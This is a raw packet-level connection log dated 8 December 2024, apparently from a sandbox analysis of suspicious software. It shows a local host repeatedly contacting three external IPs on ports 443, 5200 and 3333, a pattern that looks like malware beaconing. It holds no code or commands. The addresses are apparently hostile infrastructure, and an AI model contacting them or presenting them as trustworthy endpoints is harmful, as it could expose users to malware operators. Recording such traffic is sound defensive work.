                                                                          Dec 8, 2024 15:07:33.776027918 CET49756443192.168.2.6154.216.20.243
                                                                          Dec 8, 2024 15:07:33.781862974 CET44349756154.216.20.243192.168.2.6
                                                                          Dec 8, 2024 15:07:33.781888008 CET44349756154.216.20.243192.168.2.6
                                                                          Dec 8, 2024 15:07:33.781913042 CET49756443192.168.2.6154.216.20.243
                                                                          Dec 8, 2024 15:07:33.781959057 CET49756443192.168.2.6154.216.20.243
                                                                          Dec 8, 2024 15:07:33.781970978 CET44349756154.216.20.243192.168.2.6
                                                                          Dec 8, 2024 15:07:33.782053947 CET49756443192.168.2.6154.216.20.243
                                                                          Dec 8, 2024 15:07:33.787765026 CET44349756154.216.20.243192.168.2.6
                                                                          Dec 8, 2024 15:07:33.787782907 CET44349756154.216.20.243192.168.2.6
                                                                          Dec 8, 2024 15:07:33.787822962 CET49756443192.168.2.6154.216.20.243
                                                                          Dec 8, 2024 15:07:33.787838936 CET44349756154.216.20.243192.168.2.6
                                                                          Dec 8, 2024 15:07:33.787861109 CET49756443192.168.2.6154.216.20.243
                                                                          Dec 8, 2024 15:07:33.787882090 CET49756443192.168.2.6154.216.20.243
                                                                          Dec 8, 2024 15:07:33.793229103 CET44349756154.216.20.243192.168.2.6
                                                                          Dec 8, 2024 15:07:33.793251038 CET44349756154.216.20.243192.168.2.6
                                                                          Dec 8, 2024 15:07:33.793292046 CET49756443192.168.2.6154.216.20.243
                                                                          Dec 8, 2024 15:07:33.793329000 CET44349756154.216.20.243192.168.2.6
                                                                          Dec 8, 2024 15:07:33.793345928 CET49756443192.168.2.6154.216.20.243
                                                                          Dec 8, 2024 15:07:33.793541908 CET49756443192.168.2.6154.216.20.243
                                                                          Dec 8, 2024 15:07:33.799290895 CET44349756154.216.20.243192.168.2.6
                                                                          Dec 8, 2024 15:07:33.799316883 CET44349756154.216.20.243192.168.2.6
                                                                          Dec 8, 2024 15:07:33.799355030 CET49756443192.168.2.6154.216.20.243
                                                                          Dec 8, 2024 15:07:33.799365997 CET44349756154.216.20.243192.168.2.6
                                                                          Dec 8, 2024 15:07:33.799396038 CET49756443192.168.2.6154.216.20.243
                                                                          Dec 8, 2024 15:07:33.799416065 CET49756443192.168.2.6154.216.20.243
                                                                          Dec 8, 2024 15:07:33.875658989 CET33334977337.203.243.102192.168.2.6
                                                                          Dec 8, 2024 15:07:33.875746012 CET497733333192.168.2.637.203.243.102
                                                                          Dec 8, 2024 15:07:33.876132965 CET497733333192.168.2.637.203.243.102
                                                                          Dec 8, 2024 15:07:33.891458035 CET44349756154.216.20.243192.168.2.6
                                                                          Dec 8, 2024 15:07:33.891482115 CET44349756154.216.20.243192.168.2.6
                                                                          Dec 8, 2024 15:07:33.891563892 CET49756443192.168.2.6154.216.20.243
                                                                          Dec 8, 2024 15:07:33.891585112 CET44349756154.216.20.243192.168.2.6
                                                                          Dec 8, 2024 15:07:33.891623020 CET49756443192.168.2.6154.216.20.243
                                                                          Dec 8, 2024 15:07:33.957211971 CET44349756154.216.20.243192.168.2.6
                                                                          Dec 8, 2024 15:07:33.957236052 CET44349756154.216.20.243192.168.2.6
                                                                          Dec 8, 2024 15:07:33.957304001 CET49756443192.168.2.6154.216.20.243
                                                                          Dec 8, 2024 15:07:33.957324028 CET44349756154.216.20.243192.168.2.6
                                                                          Dec 8, 2024 15:07:33.957355022 CET49756443192.168.2.6154.216.20.243
                                                                          Dec 8, 2024 15:07:33.957370996 CET49756443192.168.2.6154.216.20.243
                                                                          Dec 8, 2024 15:07:33.962896109 CET44349756154.216.20.243192.168.2.6
                                                                          Dec 8, 2024 15:07:33.962918043 CET44349756154.216.20.243192.168.2.6
                                                                          Dec 8, 2024 15:07:33.963018894 CET49756443192.168.2.6154.216.20.243
                                                                          Dec 8, 2024 15:07:33.963030100 CET44349756154.216.20.243192.168.2.6
                                                                          Dec 8, 2024 15:07:33.963084936 CET49756443192.168.2.6154.216.20.243
                                                                          Dec 8, 2024 15:07:33.968209982 CET44349756154.216.20.243192.168.2.6
                                                                          Dec 8, 2024 15:07:33.968230009 CET44349756154.216.20.243192.168.2.6
                                                                          Dec 8, 2024 15:07:33.968275070 CET49756443192.168.2.6154.216.20.243
                                                                          Dec 8, 2024 15:07:33.968281984 CET44349756154.216.20.243192.168.2.6
                                                                          Dec 8, 2024 15:07:33.968311071 CET49756443192.168.2.6154.216.20.243
                                                                          Dec 8, 2024 15:07:33.968324900 CET49756443192.168.2.6154.216.20.243
                                                                          Dec 8, 2024 15:07:33.974030972 CET44349756154.216.20.243192.168.2.6
                                                                          Dec 8, 2024 15:07:33.974050045 CET44349756154.216.20.243192.168.2.6
                                                                          Dec 8, 2024 15:07:33.974102020 CET49756443192.168.2.6154.216.20.243
                                                                          Dec 8, 2024 15:07:33.974109888 CET44349756154.216.20.243192.168.2.6
                                                                          Dec 8, 2024 15:07:33.974175930 CET49756443192.168.2.6154.216.20.243
                                                                          Dec 8, 2024 15:07:33.980043888 CET44349756154.216.20.243192.168.2.6
                                                                          Dec 8, 2024 15:07:33.980067968 CET44349756154.216.20.243192.168.2.6
                                                                          Dec 8, 2024 15:07:33.980130911 CET49756443192.168.2.6154.216.20.243
                                                                          Dec 8, 2024 15:07:33.980138063 CET44349756154.216.20.243192.168.2.6
                                                                          Dec 8, 2024 15:07:33.980178118 CET49756443192.168.2.6154.216.20.243
                                                                          Dec 8, 2024 15:07:33.980201006 CET49756443192.168.2.6154.216.20.243
                                                                          Dec 8, 2024 15:07:33.987186909 CET44349756154.216.20.243192.168.2.6
                                                                          Dec 8, 2024 15:07:33.987215042 CET44349756154.216.20.243192.168.2.6
                                                                          Dec 8, 2024 15:07:33.987250090 CET49756443192.168.2.6154.216.20.243
                                                                          Dec 8, 2024 15:07:33.987257004 CET44349756154.216.20.243192.168.2.6
                                                                          Dec 8, 2024 15:07:33.987282038 CET49756443192.168.2.6154.216.20.243
                                                                          Dec 8, 2024 15:07:33.990616083 CET49756443192.168.2.6154.216.20.243
                                                                          Dec 8, 2024 15:07:33.993115902 CET44349756154.216.20.243192.168.2.6
                                                                          Dec 8, 2024 15:07:33.993139029 CET44349756154.216.20.243192.168.2.6
                                                                          Dec 8, 2024 15:07:33.993217945 CET49756443192.168.2.6154.216.20.243
                                                                          Dec 8, 2024 15:07:33.993225098 CET44349756154.216.20.243192.168.2.6
                                                                          Dec 8, 2024 15:07:33.993272066 CET49756443192.168.2.6154.216.20.243
                                                                          Dec 8, 2024 15:07:33.995368004 CET33334977337.203.243.102192.168.2.6
                                                                          Dec 8, 2024 15:07:34.085580111 CET44349756154.216.20.243192.168.2.6
                                                                          Dec 8, 2024 15:07:34.085606098 CET44349756154.216.20.243192.168.2.6
                                                                          Dec 8, 2024 15:07:34.085726023 CET49756443192.168.2.6154.216.20.243
                                                                          Dec 8, 2024 15:07:34.085741043 CET44349756154.216.20.243192.168.2.6
                                                                          Dec 8, 2024 15:07:34.085809946 CET49756443192.168.2.6154.216.20.243
                                                                          Dec 8, 2024 15:07:34.151093960 CET44349756154.216.20.243192.168.2.6
                                                                          Dec 8, 2024 15:07:34.151122093 CET44349756154.216.20.243192.168.2.6
                                                                          Dec 8, 2024 15:07:34.151160955 CET49756443192.168.2.6154.216.20.243
                                                                          Dec 8, 2024 15:07:34.151170969 CET44349756154.216.20.243192.168.2.6
                                                                          Dec 8, 2024 15:07:34.151186943 CET49756443192.168.2.6154.216.20.243
                                                                          Dec 8, 2024 15:07:34.151340008 CET49756443192.168.2.6154.216.20.243
                                                                          Dec 8, 2024 15:08:14.866580009 CET44349857154.216.20.243192.168.2.6
                                                                          Dec 8, 2024 15:08:14.866631031 CET49857443192.168.2.6154.216.20.243
                                                                          Dec 8, 2024 15:08:14.923929930 CET49857443192.168.2.6154.216.20.243
                                                                          Dec 8, 2024 15:08:14.923943043 CET44349857154.216.20.243192.168.2.6
                                                                          Dec 8, 2024 15:08:14.923974991 CET49857443192.168.2.6154.216.20.243
                                                                          Dec 8, 2024 15:08:14.923980951 CET44349857154.216.20.243192.168.2.6
                                                                          Dec 8, 2024 15:08:15.404654026 CET520049709185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:08:15.626882076 CET497095200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:08:16.411057949 CET520049709185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:08:16.626889944 CET497095200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:08:17.448147058 CET520049709185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:08:17.517508984 CET497095200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:08:18.423799992 CET520049709185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:08:18.626895905 CET497095200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:08:19.437485933 CET520049709185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:08:19.626898050 CET497095200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:08:20.074656963 CET497095200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:08:20.074779987 CET497115200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:08:20.074851036 CET497145200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:08:20.074875116 CET497215200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:08:20.074906111 CET497285200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:08:20.074923992 CET497505200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:08:20.194627047 CET520049709185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:08:20.194711924 CET497095200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:08:20.196021080 CET520049711185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:08:20.196083069 CET497115200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:08:20.196118116 CET520049714185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:08:20.196156025 CET520049721185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:08:20.196163893 CET497145200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:08:20.196204901 CET497215200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:08:20.196273088 CET520049728185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:08:20.196321964 CET497285200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:08:20.196341991 CET520049750185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:08:20.196386099 CET497505200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:08:24.230221987 CET498825200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:08:24.349627018 CET520049882185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:08:24.349715948 CET498825200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:08:24.349905968 CET498825200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:08:24.469074011 CET520049882185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:08:26.201128006 CET520049882185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:08:26.201282024 CET498825200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:08:26.320610046 CET520049882185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:08:26.897154093 CET520049882185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:08:26.897311926 CET498825200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:08:27.019145966 CET520049882185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:08:27.019221067 CET498825200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:08:27.138487101 CET520049882185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:08:28.782908916 CET520049882185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:08:28.783097029 CET498825200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:08:28.902506113 CET520049882185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:08:28.902597904 CET498825200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:08:29.021955967 CET520049882185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:08:29.912977934 CET520049882185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:08:30.017551899 CET498825200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:08:30.348397017 CET520049882185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:08:30.411308050 CET498945200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:08:30.423825026 CET498825200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:08:30.530721903 CET520049894185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:08:30.530818939 CET498945200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:08:30.530981064 CET498945200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:08:30.650186062 CET520049894185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:08:30.790349960 CET520049882185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:08:30.830051899 CET498825200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:08:31.599421978 CET33334977337.203.243.102192.168.2.6
                                                                          Dec 8, 2024 15:08:31.622863054 CET520049882185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:08:31.830064058 CET498825200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:08:31.830066919 CET497733333192.168.2.637.203.243.102
                                                                          Dec 8, 2024 15:08:32.383297920 CET520049894185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:08:32.386286020 CET498945200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:08:32.505647898 CET520049894185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:08:32.634670973 CET520049882185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:08:32.830054998 CET498825200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:08:33.083585024 CET520049894185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:08:33.083939075 CET499035200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:08:33.126935959 CET498945200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:08:33.203197002 CET520049903185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:08:33.203282118 CET499035200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:08:33.203418016 CET499035200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:08:33.322854996 CET520049903185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:08:33.746325970 CET520049882185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:08:33.814439058 CET498825200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:08:34.213526011 CET49907443192.168.2.6154.216.20.243
                                                                          Dec 8, 2024 15:08:34.213552952 CET44349907154.216.20.243192.168.2.6
                                                                          Dec 8, 2024 15:08:34.213622093 CET49907443192.168.2.6154.216.20.243
                                                                          Dec 8, 2024 15:08:34.229677916 CET49907443192.168.2.6154.216.20.243
                                                                          Dec 8, 2024 15:08:34.229688883 CET44349907154.216.20.243192.168.2.6
                                                                          Dec 8, 2024 15:08:34.754179001 CET520049882185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:08:34.814454079 CET498825200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:08:35.054529905 CET520049903185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:08:35.054670095 CET499035200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:08:35.174385071 CET520049903185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:08:35.751039982 CET520049903185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:08:35.751393080 CET499095200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:08:35.761826038 CET520049882185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:08:35.814485073 CET498825200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:08:35.870654106 CET520049909185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:08:35.870812893 CET499095200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:08:35.870873928 CET499095200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:08:35.892569065 CET499035200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:08:35.990142107 CET520049909185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:08:36.763315916 CET520049882185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:08:36.814445019 CET498825200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:08:37.778152943 CET520049882185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:08:37.830085993 CET498825200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:08:38.787132978 CET520049882185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:08:38.830071926 CET498825200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:08:38.861391068 CET499095200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:08:38.861650944 CET499165200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:08:38.981892109 CET520049916185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:08:38.981986046 CET499165200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:08:38.982182980 CET499165200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:08:39.026540041 CET520049909185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:08:39.101432085 CET520049916185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:08:39.802215099 CET520049882185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:08:40.017591953 CET498825200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:08:40.160119057 CET520049909185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:08:40.160182953 CET499095200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:08:40.814590931 CET520049882185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:08:40.836227894 CET520049916185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:08:40.836396933 CET499165200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:08:40.923856020 CET498825200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:08:40.957153082 CET520049916185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:08:41.534080982 CET520049916185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:08:41.534423113 CET499225200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:08:41.626970053 CET499165200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:08:41.653837919 CET520049922185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:08:41.653973103 CET499225200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:08:41.654103041 CET499225200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:08:41.773403883 CET520049922185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:08:41.824832916 CET520049882185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:08:41.923836946 CET498825200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:08:42.828438044 CET520049882185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:08:42.923841000 CET498825200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:08:43.508121014 CET520049922185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:08:43.508275986 CET499225200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:08:43.629031897 CET520049922185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:08:43.844856024 CET520049882185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:08:43.923846006 CET498825200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:08:44.204305887 CET520049922185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:08:44.204674006 CET499305200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:08:44.324152946 CET520049930185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:08:44.324237108 CET499305200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:08:44.324382067 CET499305200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:08:44.392677069 CET499225200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:08:44.443685055 CET520049930185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:08:44.858318090 CET520049882185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:08:45.017610073 CET498825200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:08:45.918513060 CET520049882185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:08:46.017607927 CET498825200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:08:46.180541039 CET520049930185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:08:46.180682898 CET499305200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:08:46.299945116 CET520049930185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:08:46.876933098 CET520049930185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:08:46.926848888 CET520049882185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:08:47.095737934 CET499305200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:08:47.126987934 CET498825200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:08:47.935961008 CET520049882185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:08:48.126996040 CET498825200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:08:48.949022055 CET520049882185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:08:49.127012968 CET498825200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:08:49.950951099 CET520049882185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:08:50.127018929 CET498825200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:08:50.865818977 CET33334977337.203.243.102192.168.2.6
                                                                          Dec 8, 2024 15:08:50.923907995 CET497733333192.168.2.637.203.243.102
                                                                          Dec 8, 2024 15:08:50.959445953 CET520049882185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:08:51.127012014 CET498825200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:08:52.024101973 CET520049882185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:08:52.127010107 CET498825200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:08:53.036780119 CET520049882185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:08:53.127043962 CET498825200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:08:54.049390078 CET520049882185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:08:54.127022028 CET498825200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:08:55.053638935 CET520049882185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:08:55.127034903 CET498825200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:08:56.206876040 CET520049882185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:08:56.314642906 CET498825200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:08:57.069554090 CET520049882185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:08:57.127090931 CET498825200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:08:58.082772970 CET520049882185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:08:58.127145052 CET498825200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:08:59.096240044 CET520049882185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:08:59.330255985 CET498825200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:09:00.098556042 CET520049882185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:09:00.220802069 CET498825200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:09:01.110538960 CET520049882185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:09:01.272878885 CET33334977337.203.243.102192.168.2.6
                                                                          Dec 8, 2024 15:09:01.330173969 CET498825200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:09:01.330176115 CET497733333192.168.2.637.203.243.102
                                                                          Dec 8, 2024 15:09:02.127204895 CET520049882185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:09:02.314548016 CET498825200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:09:03.127439976 CET520049882185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:09:03.292691946 CET498825200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:09:04.142278910 CET520049882185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:09:04.220925093 CET498825200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:10:12.762665033 CET520050014185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:10:12.814817905 CET500145200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:10:13.771589994 CET520050014185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:10:13.814794064 CET500145200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:10:14.776354074 CET520050014185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:10:14.924176931 CET500145200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:10:15.218851089 CET497733333192.168.2.637.203.243.102
                                                                          Dec 8, 2024 15:10:15.338396072 CET33334977337.203.243.102192.168.2.6
                                                                          Dec 8, 2024 15:10:15.659804106 CET33334977337.203.243.102192.168.2.6
                                                                          Dec 8, 2024 15:10:15.789052010 CET520050014185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:10:15.814855099 CET497733333192.168.2.637.203.243.102
                                                                          Dec 8, 2024 15:10:15.924180031 CET500145200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:10:16.785188913 CET520050014185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:10:16.924175024 CET500145200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:10:17.611709118 CET33334977337.203.243.102192.168.2.6
                                                                          Dec 8, 2024 15:10:17.786683083 CET520050014185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:10:17.814822912 CET497733333192.168.2.637.203.243.102
                                                                          Dec 8, 2024 15:10:17.924185038 CET500145200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:10:18.788548946 CET520050014185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:10:18.924196005 CET500145200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:10:19.793504953 CET520050014185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:10:19.924221039 CET500145200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:10:20.805445910 CET520050014185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:10:21.017927885 CET500145200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:10:21.809432030 CET520050014185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:10:22.017931938 CET500145200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:10:22.810281038 CET520050014185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:10:23.017951965 CET500145200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:10:23.819684029 CET520050014185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:10:24.017955065 CET500145200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:10:24.821899891 CET520050014185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:10:25.017961979 CET500145200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:10:25.932248116 CET520050014185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:10:26.127357960 CET500145200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:10:26.941216946 CET520050014185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:10:27.127319098 CET500145200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:10:27.952090025 CET520050014185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:10:28.127336025 CET500145200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:10:28.971184969 CET520050014185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:10:29.127345085 CET500145200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:10:29.970801115 CET520050014185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:10:30.102346897 CET500145200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:10:30.983659029 CET520050014185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:10:31.118184090 CET500145200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:10:31.996045113 CET520050014185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:10:32.082514048 CET500145200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:10:33.005800962 CET520050014185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:10:33.127394915 CET500145200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:10:34.026163101 CET520050014185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:10:34.125226974 CET500145200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:10:34.364483118 CET50021443192.168.2.6154.216.20.243
                                                                          Dec 8, 2024 15:10:34.364522934 CET44350021154.216.20.243192.168.2.6
                                                                          Dec 8, 2024 15:10:34.364594936 CET50021443192.168.2.6154.216.20.243
                                                                          Dec 8, 2024 15:10:34.372585058 CET50021443192.168.2.6154.216.20.243
                                                                          Dec 8, 2024 15:10:34.372600079 CET44350021154.216.20.243192.168.2.6
